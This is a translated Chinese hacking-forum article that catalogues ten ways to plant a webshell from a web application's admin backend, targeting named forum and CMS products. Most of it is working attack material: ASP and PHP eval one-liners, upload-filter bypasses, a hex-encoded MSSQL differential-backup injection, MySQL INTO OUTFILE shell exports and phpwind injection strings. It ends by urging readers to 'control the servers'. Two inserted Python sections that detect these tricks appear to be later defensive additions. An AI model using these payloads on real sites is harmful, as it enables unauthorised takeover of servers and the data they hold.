Ten ways to get a webshell from the admin backend: a summary - Vulnerability Warning - The Black Bar Safety Net

ID MYHACK58:6220055894
Type myhack58
Reporter Anonymous (佚名)
Modified 2005-12-29T00:00:00



The Dvbbs (动网) upload vulnerability: I believe everyone has collected plenty of "chickens" (compromised hosts) with it. One can say that the Dvbbs upfile.asp upload filter was not strict, and this vulnerability became known all over the world; by now it is much harder to come across, although some small sites may still have it. When taking a site we often spend enormous effort to get the administrator account and password and get into the backend, and although at that point we are only one step away from the site's webshell, many newbies still get shut out because they cannot think of a suitable method. So we have summarized and categorized the common ways of getting a webshell from the backend; in general there are the following ten.

Note: how to get into the backend is outside the scope of this article, so the specific methods are not given; everyone can explore that on their own. The following draws on earlier materials and articles, with thanks.

First, direct upload to get a webshell

This is fairly common for PHP and JSP programs. MolyX BOARD is one example: upload a .php file directly in the mood icon management; although there is no prompt, it has in fact succeeded, and the uploaded file URL should be http://forums/images/smiles/down. A while ago the JSP systems of all the game stations and NetEase had vulnerabilities that allowed a JSP file to be uploaded directly, keeping the original file name. The bo-blog backend allows a .php file to be uploaded directly and shows the upload path. And a year ago there was the very popular upfile.asp vulnerability (Dvbbs 5.0 and 6.0 and many early whole-site systems): because the uploaded file was not filtered strictly, a user could upload a webshell directly to any writable directory of the site and thereby gain administrator control of the site.

Second, adding or modifying the upload types

Many script upload modules now not only allow uploading legitimate file types, but most systems also allow adding upload types. The bbsxp backend can add an asa|asP type; the ewebeditor backend can also add the asa type; after modifying this we can directly upload a webshell with the .asa suffix. If .asa is filtered, the .aspasp file type can be added to upload and get a webshell. On PHP backends we can add the .php.g1f upload type; this is a PHP characteristic: as long as the last extension is not a known file type, PHP will run php.g1f as .php, so this also gets us a shell. For the LeadBbs 3.14 backend the method is: in the upload types add "asp" followed by a space (note the trailing space), then upload the ASP trojan, also remembering to add a space after its name!

Third, using backend management functions to write a webshell

Upload vulnerabilities have by now been patched almost everywhere, so after getting into the backend we can also write a webshell by modifying files. Typical examples are dvbbs 6.0 and LeadBbs 2.88, where you modify the configuration file directly in the backend and write to a file with the .asp suffix. Another method for the LeadBbs 3.14 backend: add a new affiliate link and write the Bingfox (冰狐) one-line trojan in the site-name field, typing a few arbitrary characters in front of it; http:\\website\inc\IncHtm\BoardLink.asp is then the shell we want.

Fourth, using the admin configuration file to write a webshell

Use symbols such as """":"// to construct a one-liner and write it into the program's configuration file. The joekoe forum, XX classmates, the Boiling Prospect (沸腾展望) news system, the COCOON Counter statistics program and so on, as well as many PHP applications, allow this. Taking the COCOON Counter statistics program as an example: in the admin email field add ":eval request(chr(35))//, and the line written into the file becomes webmail="\":eval request(chr(35))//". Another method is to write "%><%eval request(chr(35))%><%', which closes and reopens the surrounding tags so that the one-liner runs. <%eval request(chr(35))%> can be connected to with lake2's eval client and with the latest 2006 client; note that when planting the trojan in a database you should choose the former. Then there is Dongyi (动易) 2005: in Articles Center Manager - Top Menu Settings - Menu Other Effects, insert the one-liner "%><%execute request("l")%><%', save the top-menu parameter settings, and the trojan address is http://site/admin/rootclass_menu_config.asp.

Fifth, using backend database backup and restore to get a webshell

This mainly uses the "backup database" or "restore database" function of Access-based backends: the backup database path variable is not filtered, so any file can have its suffix changed to .asp and thus become a webshell. The MSSQL versions of these programs directly reuse the Access version's code, so the SQL versions can still be exploited. You can also back up the site's .asp files to another suffix such as .txt, which lets you view and obtain the page source code and more information about the program, increasing the chances of getting a webshell. In practice you often meet systems with no upload function that nevertheless run ASP; use this method to view the source code and find the database location, which creates an opportunity to plant a trojan in the database. The Dvbbs forum has an IP database: in the backend IP management you can insert the one-liner and then back it up to an .asp file. On breaking through upload detection: many ASP programs report the file as illegal even after the suffix is changed; putting gif89a at the head of the .asp file and changing the suffix to .gif fools the ASP program's detection and gets the file uploaded. Another way is to open an image file in Notepad, copy part of it and paste it at the head of the ASP trojan file, change the suffix to .gif, upload it to bypass detection, and then back it up to an .asp file to get a working webshell.
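An upload validator that closes the bypasses described in the second and fifth sections (trailing space after the name, asa and aspasp aliases, php.g1f double extensions, and gif89a pasted in front of ASP code). This is an added example written for this page, not code from the original article or from any of the products it mentions; the extension list, the default allow-list and the function names are assumptions.

```python
import re

# Extensions a web server would hand to a script engine (constructed list;
# extend for the platform in use). Matched after lower-casing.
SCRIPT_EXTENSIONS = {"asp", "asa", "aspx", "cer", "cdx", "php", "php3", "phtml", "jsp"}

# Server-side script markers the one-liners in this article rely on, searched
# in the whole body regardless of any image header (gif89a) pasted in front.
SCRIPT_MARKERS = re.compile(
    rb'<%|<\?(php|=|\s)|<script[^>]*runat\s*=\s*["\']?server', re.IGNORECASE
)

def normalize_name(filename: str) -> str:
    """Canonicalize the name the way the filesystem will: drop directory parts,
    strip trailing spaces and dots ('shell.asp ' -> 'shell.asp'), lower-case."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return base.rstrip(" .").lower()

def has_script_extension(filename: str) -> bool:
    """True if ANY extension segment is a script type, so 'x.php.g1f' and
    'x.asp;.gif' are caught, not just the final segment."""
    name = normalize_name(filename)
    parts = re.split(r"[.;]", name)[1:]          # every segment after the first dot
    return any(part in SCRIPT_EXTENSIONS for part in parts)

def validate_upload(filename: str, content: bytes, allowed=("gif", "jpg", "png", "txt")):
    """Return (ok, reason). Allow-list the final extension, reject script
    extensions anywhere in the name, and reject script markers in the body."""
    name = normalize_name(filename)
    if "." not in name:
        return False, "no extension"
    if has_script_extension(name):
        return False, "script extension in name"
    if name.rsplit(".", 1)[1] not in allowed:
        return False, "extension not in allow-list"
    if SCRIPT_MARKERS.search(content):
        return False, "server-side script markers in content"
    return True, "ok"
```

Checking the body as well as the name is what defeats the backup-and-rename trick: a file that passes as .gif but carries <% ... %> is refused before it ever reaches a directory the backup function can copy from.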

Sixth, using the database compression function

Compressing the database can make its anti-download protection fail, so that a one-liner inserted into the database runs successfully. The typical case is loveyuki's L-BLOG: in the friendship link's URL field write <%eval request(chr(35))%>, submit, and then under database operations compress the database; it can be compressed successfully into an .asp file, and connecting with the Ocean (海洋) one-liner eval client gives a webshell.

Seventh, asp+mssql system

Here we need to mention the Dvbbs MSSQL edition, which can be backed up directly by local submission. First, in a post, upload a fake image containing ASP code and remember its upload path. Then write a local submission form; the code is as follows:

<form action="http://website/bbs/admin_data.asp?action=RestoreData&act=Restore" method="post">
<p>Uploaded file location: <input name="Dbpath" type="text" size="80"></p>
<p>Location to copy to: <input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="submit"></p>
</form>

Save it as .htm and open it locally. Put the fake image's upload path in "uploaded file location" and the relative path where you want the webshell backed up in "location to copy to"; submit and you get our lovely webshell. The restore code is similar; modify the relevant parts. I have not come across an ASP program backend that can execute MSSQL commands more powerfully than this; Dvbbs's database restore and backup is just decoration, it cannot execute SQL commands to back up a webshell and can only run some simple query commands. You can use MSSQL injection with a differential backup to write the webshell: the backend generally shows the absolute path, and as long as there is an injection point a differential backup basically succeeds. The following is the main code of a differential backup. Using the injection vulnerability in Dvbbs 7.0 you can get a webshell with a differential backup, and with the method above you can back up the conn.asp file to a .txt file to get the database name.

A differential backup of the main code:

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226c2229253e)--
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

In this code, 0x626273 is the hex of the backup file name bbs; it can be another name such as bbs.bak. 0x3C2565786563757465207265717565737428226c2229253e is the hex of the lp one-liner <%execute request("l")%>, and 0x643A5C7765625C312E617370 is the hex of d:\web\1.asp, the path where you want the webshell backed up. Of course you can also use the more common full-backup method to get a webshell; its only drawback is that the backup file is too large, and if the backed-up database contains an anti-download table or wrong ASP code, the webshell produced will not run. Differential backup has a relatively high success rate and greatly reduces the backup file size.
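A query-log check for the disk-writing statements in this section and for the MySQL SELECT ... INTO OUTFILE form in the next one: it decodes the 0x... literals used above, inlines the @s assignment so TO DISK=@s can be judged by value, and flags any statement whose target path ends in a script extension or that carries script markers. This is an added example, not part of the original article or of any product it names; the function names, the regexes, the extension list and the one-statement-per-call assumption are mine.

```python
import re

SCRIPT_EXT = re.compile(r"\.(asp|asa|aspx|cer|cdx|php|phtml|jsp)$", re.IGNORECASE)
SCRIPT_BODY = re.compile(r"<%|<\?|<script[^>]*runat", re.IGNORECASE)

def decode_hex_literals(sql: str) -> str:
    """Turn 0x... literals into text (0x643A5C... -> d:\\web\\1.asp) so both the
    target path and the payload can be inspected."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:                      # not a byte string, leave it
            return m.group(0)
        return bytes.fromhex(digits).decode("latin-1")
    return re.sub(r"\b0x([0-9A-Fa-f]+)", repl, sql)

def inline_variables(sql: str) -> str:
    """Substitute  @var=<value>  assignments (the  select @s=0x...  form above)
    so that  to disk=@s  is checked by value. Assumes one statement per call."""
    for name, val in re.findall(r"(@\w+)\s*=\s*([^\s,;]+)", sql):
        sql = re.sub(re.escape(name) + r"(?![\w=])", lambda _: val, sql)
    return sql

def written_paths(sql: str):
    """Paths the statement would create on disk: MSSQL BACKUP ... TO DISK= and
    MySQL SELECT ... INTO OUTFILE / DUMPFILE."""
    q = inline_variables(decode_hex_literals(sql))
    paths = re.findall(r"to\s+disk\s*=\s*'?([^'\s;]+?)'?(?=--|\s|;|$)", q, re.I)
    paths += re.findall(r"into\s+(?:out|dump)file\s+'([^']*)'", q, re.I)
    return paths

def classify(sql: str) -> str:
    """'webshell-write' when a script file would land on disk, 'script-payload'
    when script markers travel inside the statement, otherwise 'ok'."""
    if any(SCRIPT_EXT.search(p) for p in written_paths(sql)):
        return "webshell-write"
    if SCRIPT_BODY.search(decode_hex_literals(sql)):
        return "script-payload"
    return "ok"
```

Run per statement over the database's query log (or an injection-prone parameter log); the full-name backup to bbs classifies as ok while the differential backup to d:\web\1.asp and the INSERT carrying <%execute request("l")%> both trigger.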

Eighth, php+mysql system

The backend needs a MySQL data query function; we can use it to run a SELECT ... INTO OUTFILE query that outputs a PHP file. Since all data is stored in MySQL, we can put our webshell code into MySQL by normal means and export a shell with the SELECT ... INTO OUTFILE statement. In the MySQL operation box enter select 0x3C3F6576616C28245F504F53545B615d293b3f3e from mysql.user into outfile 'path' to obtain a <? eval($_POST[a]);?> one-liner; 0x3C3F6576616C28245F504F53545B615d293b3f3e is the hex of our <? eval($_POST[a]);?>. This method is fairly common with phpMyAdmin: first use the phpMyAdmin path-disclosure vulnerability, the typical one being http://url/phpmyadmin/libraries/select_lang.lib.php.

This exposes the path; in a PHP environment the absolute path is relatively easy to expose. One point: when MySQL runs on a Windows system, the path should be written as d:\\wwwroot\\a.php. The following method is the more common way to export a webshell; you can also write a VBS script that adds a system administrator and export it to the Startup folder, so that after the system restarts it adds an administrator account.

CREATE TABLE a(cmd text NOT NULL);
INSERT INTO a(cmd) VALUES('<? fputs(fopen("./a.php","w"),"<? eval(\$_POST[a]);?>")?>');
SELECT cmd FROM a INTO OUTFILE 'path/b.php';
DROP TABLE IF EXISTS a;

Accessing b.php then generates a <? eval($_POST[a]);?> one-liner. If you come across a backend that can execute PHP commands it is much simpler; a typical representative is BO-BLOG: in the backend's PHP command box enter the following code:

<? $sa = fopen("./up/saiy.php","w"); fwrite($sa,"<? eval(\$_POST[a]);?".">"); fclose($sa); ?>

This generates a file named saiy.php in the up directory whose content is <? eval($_POST[a]);?>, the smallest PHP trojan; finally connect with the lanker client. In practice, consider whether the folder has write permission. Alternatively enter this code: <? fputs(fopen("./a.php","w"),"<? eval(\$_POST[a]);?>")?>, which generates an a.php one-liner in the current directory.

Ninth, three ways to get a webshell from the phpwind forum backend

Method 1: template method

Go into the backend and, in the template style settings, write the code on just one line; remember, this code must be flush against the left edge of the line, with no characters before it.

EOT; eval($a); print <<<EOT

You then get a shell at http://website/bbs/index.php.

Method 2: bad words filter method

Go to Security Management ◇ Bad Words Filter. In "add bad words" write a']='aa';eval($_POST['a']);//

The "replace with" field can be anything; the shell address is then http://website/bbs/data/bbscache/wordsfb.php.

Method 3: user level management

In newmembersset, the title can be anything, but do not write single or double quotes or other special symbols; in the upgrade picture number write a';eval($_POST['a']);// and the upgrade points can again be anything. The shell address is then http://website/bbs/data/bbscache/level.php.

The password for the webshells obtained in the above three ways is a, for the server side of lanker's one-liner backdoor.

Tenth, using the website's visitor counter records to get a webshell

The most obvious case is the Ajiang (阿江) counter program bundled with private-server programs. By submitting directly to http://website/stat.asp?style=text&referer=code content&screenwidth=1024 you can insert code straight into the counter's database; this system's default database is count#.asa, so we can access http://site/count%23.asa to get a webshell. Since the Ajiang counter filters % and +, replace the one-liner with <SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request("1"))</SCRIPT> as the code content of the submission, then connect with the lake2 eval client. It is worth mentioning that if you get into the counter's backend you can clear the data at some point, so once inserting the ASP trojan fails you can clear the database and try again.


Since this article touches on many versions of many programs, it is impossible to provide a single complete fix. If you can, patch the vulnerable files mentioned in this article appropriately; if a vulnerable file does not affect the use of the system, you can delete it. If you cannot patch it yourself, go to the relevant official website to download the latest patch and update. Please also keep an eye on the latest announcements released by the security network, and if you find a related vulnerability yourself, you may also notify the official website.


In fact there should be many more techniques for getting a webshell from the backend; the key is how flexibly everyone applies them and draws inferences from them. I hope this piece serves to get things started. Come on everyone, let's control the servers!